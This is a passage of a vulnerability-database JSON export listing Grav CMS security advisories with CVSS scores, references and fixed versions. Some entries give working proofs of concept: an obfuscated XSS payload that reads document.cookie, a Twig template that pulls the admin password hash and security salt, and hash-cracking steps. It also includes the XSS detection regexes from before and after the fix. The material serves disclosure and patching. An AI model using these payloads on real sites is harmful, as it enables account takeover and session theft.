            "summary": "Grav Exposes Password Hashes Leading to privilege escalation\n# Exposure of Password Hashes Leading to privilege escalation\n**Severity Rating:** Medium \n\n**Vector:** Privilege Escalation\n\n**CVE:** XXX\n\n**CWE:** 200 - Exposure of Sensitive Information\n\n**CVSS Score:** 6.2\n\n**CVSS Vector:** CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L\n\n## Analysis\n\nIt was observed that if a user is given read access to the user account management section of the admin panel, they can view the password hashes of all users, including the admin user. This exposure can potentially lead to privilege escalation if an attacker can crack these password hashes.\n\nAn attacker with read access can: \n* View and potentially crack the password hashes.\n* Gain administrative access by cracking the admin password hash.\n* Escalate privileges and compromise the entire admin panel.\n\n\n## Proof of Concept\n\n1) Give read access to user accounts to a random user as shown in the following figures:\n  ![grav0](https://github.com/user-attachments/assets/020a4b47-e577-49cb-8392-bfb61491199d)\n  ![grav2](https://github.com/user-attachments/assets/97fbfc46-c541-4559-9541-2b9b5de86c0e)\n  \n\n2) Log in to the admin panel with an account that has read access to user accounts and navigate to the user account management section.\n\n3) Go to the admin profile `http://127.0.0.1/admin/accounts/users/admin`; the password is not displayed.\nTry inspecting the page source code as shown in the following figures:\n  ![grav2-1](https://github.com/user-attachments/assets/057c9c14-f928-4584-99ae-4939f63dda57)\n  \n   You can see that it matches the hash in the admin.yaml file:\n  ![Compare to the hash in database of the admin](grav2-2.png)\n  \n\n4) Crack the hash as shown in the following figure; the algorithm used here is bcrypt:\n  \n![grav3](https://github.com/user-attachments/assets/ec334f80-4b87-4010-a834-cb92704a596e)\n  \n\n## Workarounds\nNo workaround is currently known\n\n# Timeline\n**2024-07-24** Issue identified\n\n**2024-09-27** Vendor contacted\n\n\n# About X41 D-Sec GmbH\nX41 is an expert provider for application security services.\nHaving extensive industry experience and expertise in the area of information\nsecurity, a strong core security team of world-class security experts enables\nX41 to perform premium security services.\n\nFields of expertise in the area of application security are security-centered\ncode reviews, binary reverse engineering and vulnerability discovery.\nCustom research and IT security consulting and support services are core\ncompetencies of X41.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66304",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00071",
                            "scoring_system": "epss",
                            "scoring_elements": "0.2179",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66304"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/9d11094e4133f059688fad1e00dbe96fb6e3ead7",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-12-02T20:15:09Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/9d11094e4133f059688fad1e00dbe96fb6e3ead7"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66304",
                    "reference_id": "CVE-2025-66304",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66304"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-gq3g-666w-7h85",
                    "reference_id": "GHSA-gq3g-666w-7h85",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-gq3g-666w-7h85"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-gq3g-666w-7h85",
                    "reference_id": "GHSA-gq3g-666w-7h85",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-12-02T20:15:09Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-gq3g-666w-7h85"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"
                }
            ],
            "aliases": [
                "CVE-2025-66304",
                "GHSA-gq3g-666w-7h85"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bafn-ne38-nucy"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49321?format=api",
            "vulnerability_id": "VCID-bhhz-z132-zkhb",
            "summary": "Grav vulnerable to Privilege Escalation and Authenticated Remote Code Execution via Twig Injection\nA user with admin panel access and permissions to create or edit pages in Grav CMS can enable Twig processing in the page frontmatter. By injecting malicious Twig expressions, the user can escalate their privileges to admin or execute arbitrary system commands via the scheduler API. This results in both Privilege Escalation (PE) and Remote Code Execution (RCE) vulnerabilities.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66297",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00475",
                            "scoring_system": "epss",
                            "scoring_elements": "0.65195",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66297"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:26:40Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66297",
                    "reference_id": "CVE-2025-66297",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66297"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-858q-77wx-hhx6",
                    "reference_id": "GHSA-858q-77wx-hhx6",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-858q-77wx-hhx6"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-858q-77wx-hhx6",
                    "reference_id": "GHSA-858q-77wx-hhx6",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:26:40Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-858q-77wx-hhx6"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"
                }
            ],
            "aliases": [
                "CVE-2025-66297",
                "GHSA-858q-77wx-hhx6"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bhhz-z132-zkhb"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/46988?format=api",
            "vulnerability_id": "VCID-bwvg-jg4z-nyhp",
            "summary": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\nA cross-site scripting (XSS) vulnerability in Grav versions 1.7.44 and before, allows remote authenticated attackers to execute arbitrary web scripts or HTML via the onmouseover attribute of an ISINDEX element.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-31506",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00046",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1466",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-31506"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://m3n0sd0n4ld.github.io/patoHackventuras/cve-2023-31506",
                    "reference_id": "CVE-2023-31506",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-16T17:13:14Z/"
                        }
                    ],
                    "url": "https://m3n0sd0n4ld.github.io/patoHackventuras/cve-2023-31506"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31506",
                    "reference_id": "CVE-2023-31506",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31506"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-xrf8-cmrg-7436",
                    "reference_id": "GHSA-xrf8-cmrg-7436",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-xrf8-cmrg-7436"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/68849?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.7.44",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1ps5-3k43-p3fa"
                        },
                        {
                            "vulnerability": "VCID-4a2z-37a3-2qaw"
                        },
                        {
                            "vulnerability": "VCID-5kr2-3ywy-9kcn"
                        },
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-7jaz-7xjc-kka1"
                        },
                        {
                            "vulnerability": "VCID-9j1y-z47y-xudz"
                        },
                        {
                            "vulnerability": "VCID-9tu1-4n1t-6bgv"
                        },
                        {
                            "vulnerability": "VCID-a375-aqzf-r7gw"
                        },
                        {
                            "vulnerability": "VCID-a8df-4jgt-gba4"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-abwg-zvc9-w7dq"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-bafn-ne38-nucy"
                        },
                        {
                            "vulnerability": "VCID-bhhz-z132-zkhb"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-egxp-rctq-xyh8"
                        },
                        {
                            "vulnerability": "VCID-esjd-ztwe-c3h1"
                        },
                        {
                            "vulnerability": "VCID-f3wx-5ayr-tqga"
                        },
                        {
                            "vulnerability": "VCID-fmmu-r77k-c7g2"
                        },
                        {
                            "vulnerability": "VCID-k8fd-bqpk-2qg8"
                        },
                        {
                            "vulnerability": "VCID-kbnn-6uws-kqh9"
                        },
                        {
                            "vulnerability": "VCID-p1u7-9mk4-fkcr"
                        },
                        {
                            "vulnerability": "VCID-p5d4-8rvg-uqem"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-rj4b-8dyu-juen"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-ss11-shq5-qqae"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-v8u1-nbxw-a7fr"
                        },
                        {
                            "vulnerability": "VCID-v9n7-vann-6fa5"
                        },
                        {
                            "vulnerability": "VCID-vm87-35gf-eyft"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        },
                        {
                            "vulnerability": "VCID-y7vc-cx37-7ubs"
                        },
                        {
                            "vulnerability": "VCID-yh73-zyju-vqge"
                        },
                        {
                            "vulnerability": "VCID-ymnw-h6as-fbe5"
                        },
                        {
                            "vulnerability": "VCID-zg5t-uqx2-87fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.44"
                }
            ],
            "aliases": [
                "CVE-2023-31506",
                "GHSA-xrf8-cmrg-7436"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bwvg-jg4z-nyhp"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95256?format=api",
            "vulnerability_id": "VCID-c9jy-y2dh-x3dg",
            "summary": "Grav Vulnerable to Publisher-Level Stored XSS via Unquoted Event Attributes\n### Summary\nA stored Cross-Site Scripting (XSS) vulnerability in `getgrav/grav` allows publisher-level accounts to execute arbitrary JavaScript. The issue arises from a blacklist bypass in the `detectXss()` function when handling unquoted HTML event attributes.\n\n### Details\nThe `detectXss()` function relies on a blacklist pattern to filter malicious attributes. The specific regex pattern used to match `on*` events is flawed:\n```php\n'on_events' => '#(<[^>]+[a-z\\x00-\\x20\\\"\\'\\/])(on[a-z]+|xmlns)\\s*=[\\s|\\'\\\"].*[\\s|\\'\\\"]>#iUu'\n```\nThis pattern fails to properly identify `on*` event handlers that are constructed without quotation marks. This allows an attacker to completely bypass the filter. *Note: It is highly recommended to replace this blacklist approach with a robust, established HTML sanitization library.*\n\n### PoC\nAn attacker with publisher-level access can reproduce this by injecting the following payload into any vulnerable content field:\n```html\n<img src=x onerror=eval(atob(/YWxlcnQoZG9jdW1lbnQuY29va2llKQ/.source))>\n```\n<img width=\"1889\" height=\"482\" alt=\"image1\" src=\"https://github.com/user-attachments/assets/0f1a339b-25a8-4b6e-91af-8c59e6a39297\" />\n<img width=\"3055\" height=\"920\" alt=\"image2\" src=\"https://github.com/user-attachments/assets/12680058-bbb3-4446-b58e-515533bb4e90\" />\n<img width=\"2909\" height=\"1339\" alt=\"image3\" src=\"https://github.com/user-attachments/assets/c7ed7e61-8dcf-402d-8589-98d18978c71a\" />\n\n\n**Execution Details:**\nThe `onerror` event is written without quotes to bypass the regex. Because unquoted attributes are restricted in their character usage (e.g., the `=` symbol cannot be used easily), the payload leverages `atob()` and regex `.source` to decode the base64 string `YWxlcnQoZG9jdW1lbnQuY29va2llKQ` (which translates to `alert(document.cookie)`). 
The `atob()` function conveniently auto-completes the necessary `=` padding for the base64 string.\n\n### Impact\n- **Vulnerability Type:** Stored Cross-Site Scripting (XSS)\n- **Impacted Parties:** Any user (including administrators) who views the compromised content published by the attacker.\n- **Consequences:** Attackers can execute malicious scripts in a victim's browser, leading to session hijacking (cookie theft), unauthorized actions.\n\n\n---\n\n## Maintainer note — fix applied (2026-04-24)\n\nFixed in Grav core on the `2.0` branch: commit [`5a12f9be8`](https://github.com/getgrav/grav/commit/5a12f9be8) — will ship in **2.0.0-beta.2**.\n\n**What changed:** the `on_events` regex in `Security::detectXss()` no longer requires quotes or whitespace around `=`. The previous form:\n\n```\n'on_events' => '#(<[^>]+[\\s\\x00-\\x20\\\"\\'\\/])(on\\s*[a-z]+|xmlns)\\s*=[\\s|\\'\\\"].*[\\s|\\'\\\"]>#iUu'\n```\n\nrequired `[\\s|'\"]` immediately after the `=`, so `<img src=x onerror=alert(1)>` slid past. The new regex drops the value-matching tail entirely and just flags the presence of an `on*=` attribute anywhere inside a tag:\n\n```\n'on_events' => '#<[^>]*?[\\s\\x00-\\x20\\\"\\'\\/](on\\s*[a-z]+|xmlns)\\s*=#iu'\n```\n\nDetecting the attribute name + `=` is enough for a tripwire — the trade-off is occasional false positives on legitimate attribute *values* containing `on*=` substrings, which the maintainer can hand-approve.\n\nThis same regex bypass was the detection-layer half of GHSA-c2q3-p4jr-c55f and GHSA-w8cg-7jcj-4vv2; the fix here knocks both down.\n\n**Files:**\n- [`system/src/Grav/Common/Security.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Security.php).\n- [`tests/unit/Grav/Common/Security/DetectXssTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/DetectXssTest.php) — 18 cases: unquoted PoCs, quoted-form regression, safe-content negatives.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42612",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.0996",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42612"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:52:35Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-9695-8fr9-hw5q",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:52:35Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-9695-8fr9-hw5q"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42612",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42612"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-9695-8fr9-hw5q",
                    "reference_id": "GHSA-9695-8fr9-hw5q",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-9695-8fr9-hw5q"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110986?format=api",
                    "purl": "pkg:composer/getgrav/grav@2.0.0-beta.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@2.0.0-beta.2"
                }
            ],
            "aliases": [
                "CVE-2026-42612",
                "GHSA-9695-8fr9-hw5q"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-c9jy-y2dh-x3dg"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/93148?format=api",
            "vulnerability_id": "VCID-e61c-rd9y-wyhs",
            "summary": "Grav Vulnerable to Sensitive Information Disclosure via Accounts Service Bypass\n## Summary\nInformation disclosure exists in `Grav CMS v1.8.0-beta.29`. Despite previous security patches (notably in `v1.8.0-beta.27/28`) aimed at restricting sensitive object access within the Twig environment, the Accounts Service remains exposed.\n\nA low-privileged user (EX: Content Editor with only pages.update permissions) can bypass the existing Twig sandbox restrictions by utilizing the `grav['accounts']` service. Attacker can programmatically load administrative user objects and extract sensitive data, including Bcrypt password hashes and the security salt.\n\n## Affected version\nGrav CMS: `v1.8.0-beta.29` (and earlier 1.8.x beta versions).\n\nNote: This vulnerability persists even after the vendor attempted to mitigate similar SSTI vectors in earlier beta releases.\n\n## Steps to Reproduce\n1. Create a low-privileged account (MY CASE IS 'editor_chen') with permissions limited to admin.login and basic page management (create, update, list). Ensure all administrative permissions (Configuration, User Accounts, ...) are explicitly Denied.\n\n2. Login to the Admin panel using  `editor_chen`. Navigate to Pages and edit the `Home` page.\n\n\n3. Under the Advanced tab, ensure Process Twig is enabled .\n\n4. In the Content tab, inject the following Twig payload designed to bypass the `isDangerousFunction` filter by accessing the internal service container:\n```\n---\ntitle: Information Disclosure Test\nprocess:\n    twig: true\n---\n# Security Audit Results\n- Admin Password Hash: {{ grav['accounts'].load('admin').get('hashed_password') }}\n- Security Salt: {{ grav.config.get('security.salt') }}\n```\n<img width=\"1176\" height=\"618\" alt=\"GRAV\" src=\"https://github.com/user-attachments/assets/7970216a-2dc6-4d1b-8dfd-b64f3712c9c5\" />\n\n\n5. Click Save. And navigate to the public page (`http://localhost:8000/home`). 
